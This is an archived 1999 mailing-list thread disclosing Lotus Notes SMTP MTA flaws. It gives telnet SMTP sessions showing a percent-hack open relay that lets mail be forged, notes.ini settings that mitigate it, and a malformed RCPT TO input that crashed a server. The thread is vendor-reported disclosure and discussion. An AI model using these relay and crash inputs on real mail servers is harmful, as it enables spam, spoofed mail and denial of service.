lotus.notes.relay.txt

`Date: Mon, 14 Jun 1999 17:40:35 +0100  
From: Robert Lister <[email protected]>  
To: [email protected]  
Subject: Lotus Notes Relay  
  
Following postings about NTMail having open relaying ability, (in certain  
situations) I have identified a problem with the Lotus SMTP MTA (right up  
to v4.6.4, have yet to test Domino 5)  
  
Basically, it's possible to relay (and even appear to "forge" a message)  
using a combination of the percent hack and the blank from address,  
and this is *despite* having changed the notes.ini with the settings  
for anti-relaying:  
  
telnet server 25  
Connected to 192.168.100.1.  
Escape character is '^]'.  
220 company.com Lotus SMTP MTA Service Ready  
HELO some.domain  
250 company.com  
MAIL FROM:<>  
250 OK  
RCPT TO:<recipient%[email protected]>  
250 OK  
DATA  
>From: ... etc  
  
whaterver you like..  
  
.  
250 Message received OK.  
quit  
221 GoodBye  
  
The bad bit of this is that notes seems to strip out previous headers  
(depending on how it's configured) and add new outgoing notes headers,  
and it even goes as far as doing thigs like expanding cc:headers and  
permitting sending to notes mailing lists, etc, making it look like  
mail originated from the notes domain itself.  
  
It also takes whatever I put in the "From: " header and presents  
this in its outgoing "MAIL FROM:<>"  
  
I have contacted Lotus support and they have confirmed that this  
is an issue and are looking in to it. Can't wait to get testing  
on version 5!!  
  
I have also pointed out to them that the lotus SMTP MTA seems  
to accept any mail for any domain, and then, only having accepted  
it, make a decision as to what to do with it. If it decides that it  
cannot relay it, it generates a message back to the "sender" that  
"this server will not relay" however, 9 times of of 10, the remote  
domain won't exist, so this message will fail. - as opposed to  
responding with, say, 5xx relaying not permitted before accepting  
the message. - Possibly not the best use of the protocol!  
  
  
Regards,  
  
  
Rob  
  
([email protected])  
  
--------------------------------------------------------------------------------  
  
Date: Wed, 16 Jun 1999 08:52:28 +1000  
From: Mark Laffan <[email protected]>  
To: [email protected]  
Subject: Re: Lotus Notes Relay  
  
This will work UNLESS the two below notes.ini settings are set.  
  
smtpmta_allow_known_domains=1  
smtp_och_reject_smtp_originated_messages=1  
  
Connected to 192.168.100.1.  
Escape character is '^]'.  
220 company.com Lotus SMTP MTA Service Ready  
HELO some.company  
250 company.com  
MAIL FROM:<>  
250 OK  
RCPT TO:<recipient%[email protected]>  
501 This MTA is configured NOT to relay message from [some.server.com] to  
[company.com.com].  
quit  
221 GoodBye  
  
This is a new SMTPMTA setting from R4.6.4 onward.  
  
Cheers  
Mark  
  
--------------------------------------------------------------------------------  
  
Date: Wed, 16 Jun 1999 10:06:18 +0100  
From: Robert Lister <[email protected]>  
To: [email protected]  
Subject: Re: Lotus Notes Relay  
  
On Wed, Jun 16, 1999 at 08:52:28AM +1000, Mark Laffan wrote:  
> This will work UNLESS the two below notes.ini settings are set.  
>  
> smtpmta_allow_known_domains=1  
> smtp_och_reject_smtp_originated_messages=1  
>  
> Connected to 192.168.100.1.  
> Escape character is '^]'.  
> 220 company.com Lotus SMTP MTA Service Ready  
> HELO some.company  
> 250 company.com  
> MAIL FROM:<>  
> 250 OK  
> RCPT TO:<recipient%[email protected]>  
> 501 This MTA is configured NOT to relay message from [some.server.com] to  
> [company.com.com].  
> quit  
> 221 GoodBye  
>  
> This is a new SMTPMTA setting from R4.6.4 onward.  
>  
> Cheers  
> Mark  
>  
  
Interesting that one. It seems to be more secure in that it sends 501 back  
for anything it doesn't like, but our server still permits me to relay  
using the mentioned percent hack, IF the domain after the @ sign is the  
same as the server's domain name.  
  
PS: lotus didn't seem to know about this one, so I'll let  
the guy I was speaking to at lotus know.  
  
Interesing possible DOS attack on my server:  
- will do a little more research (but I'll have to put together  
a test server, my notes guy is getting irritated rebooting the  
live server that I picked on to do this, since I did this quite  
by accident!)  
  
Trying 192.168.100.10...  
Connected to 192.168.100.10.  
Escape character is '^]'.  
220 company.com Lotus SMTP MTA Service Ready  
HELO lart  
250 company.com  
MAIL FROM:<[email protected]>  
250 OK  
RCPT TO:<[email protected]>  
501 This MTA is configured NOT to relay message from [xxxxx] to [bogus.org].  
RCPT TO:<robl%  
  
[server dead]  
  
Server console has an error on it:  
  
Application Error Notification:  
  
niseshlr.exe  
  
Crash information will be saved in the NOTES.RIP file.  
  
  
Ooooops!  
  
  
  
  
Rob  
  
`